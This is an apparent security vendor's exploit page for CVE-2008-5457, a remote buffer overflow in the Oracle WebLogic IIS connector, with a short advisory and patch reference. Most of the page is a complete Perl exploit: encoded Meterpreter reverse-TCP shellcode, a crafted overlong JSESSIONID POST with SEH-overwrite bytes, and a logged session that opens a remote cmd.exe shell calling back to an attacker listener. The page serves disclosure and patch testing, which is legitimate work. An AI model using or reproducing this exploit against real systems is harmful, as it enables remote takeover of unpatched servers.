Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit

Name Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit
Systems Affected WebLogic Server and WebLogic Express
Severity High Risk
Category Remote Overflow
Vendor URL http://www.oracle.com/
Credit Guido Landi
Exploit http://www.milw0rm.com
Date 01 Apr 2009
Advisory CVE-2008-5457

Details

A buffer overflow vulnerability in the WebLogic IIS connector allows remote attackers to execute arbitrary commands by sending a long, specially crafted JSESSIONID parameter to the server. This vulnerability in WebLogic Portal may allow elevation of privileges. This may be exploited over a network.



Example
#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E
# [*] Please wait while we load the module tree...
# [*] Handler binding to LHOST 0.0.0.0
# [*] Started reverse handler
# [*] Starting the payload handler...
# [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
# [*] Sending stage (75776 bytes)
# [*] Meterpreter session 1 opened (10.10.10.1:80 -> 10.10.10.4:2171)
#
# meterpreter > rev2self
# meterpreter > execute -i -f cmd.exe
# Process 3092 created.
# Channel 1 created.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# c:\windows\system32\inetsrv>
# LHOST=10.10.10.1 LPORT=80
# windows/reflectivemeterpreter/reverse_tcp
# [*] x86/alpha_mixed succeeded, final size 619
my $shellcode =
"\xd9\xec\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x4b\x4c\x4b\x58\x46\x36\x45\x50\x45\x50\x43" .
"\x30\x50\x53\x46\x35\x51\x46\x51\x47\x4c\x4b\x42\x4c\x47" .
"\x54\x44\x58\x4c\x4b\x50\x45\x47\x4c\x4c\x4b\x51\x44\x43" .
"\x35\x44\x38\x45\x51\x4b\x5a\x4c\x4b\x50\x4a\x45\x48\x4c" .
"\x4b\x51\x4a\x47\x50\x43\x31\x4a\x4b\x4b\x53\x50\x32\x51" .
"\x59\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50\x31\x4b" .
"\x4f\x4b\x4c\x50\x31\x49\x50\x4e\x4c\x47\x48\x4d\x30\x43" .
"\x44\x44\x47\x49\x51\x48\x4f\x44\x4d\x43\x31\x49\x57\x4a" .
"\x4b\x4b\x42\x47\x4b\x43\x4c\x47\x54\x42\x34\x44\x35\x4b" .
"\x51\x4c\x4b\x51\x4a\x47\x54\x45\x51\x4a\x4b\x43\x56\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a" .
"\x4b\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4a\x48\x4a\x4b\x43" .
"\x32\x50\x31\x49\x50\x51\x4f\x51\x4e\x51\x4d\x51\x4b\x48" .
"\x42\x45\x58\x43\x30\x51\x4e\x42\x4a\x46\x50\x51\x49\x43" .
"\x54\x4c\x4b\x42\x39\x4c\x4b\x51\x4b\x44\x4c\x4c\x4b\x51" .
"\x4b\x45\x4c\x4c\x4b\x45\x4b\x4c\x4b\x51\x4b\x44\x48\x51" .
"\x43\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x4b\x4f\x4e" .
"\x36\x4d\x59\x48\x47\x46\x33\x45\x38\x46\x34\x48\x4a\x4e" .
"\x4f\x4c\x51\x4b\x4f\x49\x46\x4d\x51\x4a\x4c\x45\x50\x43" .
"\x31\x43\x30\x45\x50\x50\x50\x46\x37\x46\x36\x51\x43\x4d" .
"\x59\x4d\x35\x4d\x38\x45\x4f\x43\x30\x45\x50\x43\x30\x4a" .
"\x30\x43\x31\x43\x30\x45\x50\x48\x36\x45\x49\x42\x38\x4d" .
"\x37\x49\x34\x42\x39\x42\x50\x4d\x39\x4a\x4c\x4c\x39\x4e" .
"\x4a\x43\x50\x48\x59\x45\x59\x4a\x55\x4e\x4d\x48\x4b\x4a" .
"\x4d\x4b\x4c\x47\x4b\x51\x47\x50\x53\x46\x52\x51\x4f\x46" .
"\x53\x46\x52\x45\x50\x51\x4b\x4c\x4d\x50\x4b\x42\x38\x46" .
"\x31\x4b\x4f\x48\x57\x4b\x39\x49\x4f\x4b\x39\x48\x43\x4c" .
"\x4d\x44\x35\x44\x54\x43\x5a\x45\x55\x50\x59\x46\x31\x46" .
"\x33\x4b\x4f\x46\x54\x4c\x4f\x4b\x4f\x50\x55\x44\x44\x51" .
"\x49\x4c\x49\x44\x44\x4c\x4e\x4b\x52\x4b\x42\x46\x4b\x47" .
"\x57\x50\x54\x4b\x4f\x50\x37\x4b\x4f\x46\x35\x51\x38\x46" .
"\x51\x49\x50\x50\x50\x46\x30\x46\x30\x46\x30\x47\x30\x46" .
"\x30\x47\x30\x50\x50\x4b\x4f\x51\x45\x51\x34\x4b\x39\x48" .
"\x47\x45\x38\x44\x4a\x45\x5a\x44\x4a\x45\x51\x43\x58\x44" .
"\x42\x45\x50\x45\x50\x46\x30\x4b\x39\x4d\x31\x43\x5a\x42" .
"\x30\x46\x31\x51\x47\x4b\x4f\x50\x55\x51\x30\x43\x5a\x51" .
"\x50\x51\x4e\x46\x36\x49\x51\x4a\x46\x45\x56\x51\x46\x49" .
"\x51\x4a\x46\x44\x48\x46\x36\x43\x5a\x45\x50\x4b\x4f\x46" .
"\x35\x44\x4c\x4d\x59\x49\x53\x42\x4a\x43\x30\x50\x56\x51" .
"\x43\x50\x57\x4b\x4f\x46\x35\x44\x58\x4b\x4f\x48\x53\x44" .
"\x4a\x41\x41";
use warnings;
use strict;
use IO::Socket::INET;
my $sock = IO::Socket::INET->new(PeerAddr => '10.10.10.4', PeerPort => '80', Proto => 'tcp');
print $sock "POST /index.jsp?;JSESSIONID=" .
"B" x 5132 .
$shellcode .
"C" x (3000-length($shellcode)) .
"\xe9\x43\xf4\xff\xff" . # jmp back
"\x90\x90\xeb\xf7" . # jmp back
"\x76\x79" . # SEH partial rewrite
" HTTP/1.0\r\n" .
"Connection:Keep-Alive\r\n" .
"Content-Length: 81\r\n\r\n" . "A" x 81 . "\r\n";



Patch Information
Apply patch #7825169 as instructed in the Oracle Security Advisory from OracleMetaLink.




© 2009 by Red-Database-Security GmbH - last update 20-jun-2009

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.